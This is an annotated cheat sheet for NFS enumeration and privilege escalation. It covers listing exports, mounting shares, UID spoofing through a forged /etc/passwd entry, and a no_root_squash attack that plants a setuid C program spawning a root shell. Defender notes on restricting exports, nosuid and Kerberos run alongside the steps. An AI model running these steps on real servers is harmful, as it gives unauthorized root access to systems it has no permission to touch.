# NFS - 2049
# Cheat sheet for enumerating and reviewing NFS exports (service port 2049).
# <IP>, <SHARE>, <DIRECTORY> and <USER> are placeholders to fill in by hand;
# the `showmount -a` line uses the shell variable $ip for the same address.

# Show Mountable NFS Shares
# -e prints the server's export list together with the clients allowed to
# mount each export. showmount asks the server's mountd service, so a server
# that only offers NFSv4 may return nothing here.
showmount -e <IP>
# -a lists client:directory pairs the server has recorded as mounted.
showmount -a $ip
# Same export listing through the nmap NSE script; -oN saves the normal
# output to a file named mountable_shares.
nmap --script=nfs-showmount -oN mountable_shares <IP>
# Defender note: an export list open to "*" or to a whole subnet is what makes
# the steps below possible; restrict each export to named client hosts.

# Mount a share
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
# vers=2 forces the NFSv2 protocol; recent kernels and servers may no longer
# support it.
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>

# If no read/write add user to Passwd with proper group
# With the default AUTH_SYS security flavour the server trusts the numeric
# UID/GID sent by the client, so access follows whichever local account has
# the same numbers as the file owner. 1016 below is a sample value, and
# /home/pwn does not follow the <USER> placeholder used elsewhere on the page.
# Defender note: file permissions on an AUTH_SYS export do not authenticate
# anyone; limit exports to trusted clients or use Kerberos (sec=krb5).
adduser <USER>
nano /etc/passwd
<USER>:x:1016:1016:,,,:/home/pwn:/bin/bash
su <USER>

# NFS misconfigurations
# List exported shares
# Run on the NFS server itself: /etc/exports holds each export and its options.
cat /etc/exports
# If an export carries no_root_squash you may be able to privesc: root on a
# client is then treated as root on the exported files. no_all_squash is the
# default and is not a finding by itself; root_squash is also the default, so
# no_root_squash only appears when someone set it explicitly.
# Mitigation: remove no_root_squash, mount the exported filesystem with nosuid
# on the server, and audit exports for setuid files
# (find <EXPORT_PATH> -xdev -perm -4000).

# Attacker, as root user
# The binary is created by client root over the export, so with no_root_squash
# it is stored on the server owned by root; chmod +s then sets its
# setuid/setgid bits.
mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn
# Victim
# Here <SHARE> is the exported directory as a local path on the server; the
# setuid bit is only honoured if that filesystem is not mounted nosuid.
cd <SHARE>
./pwn # Root shell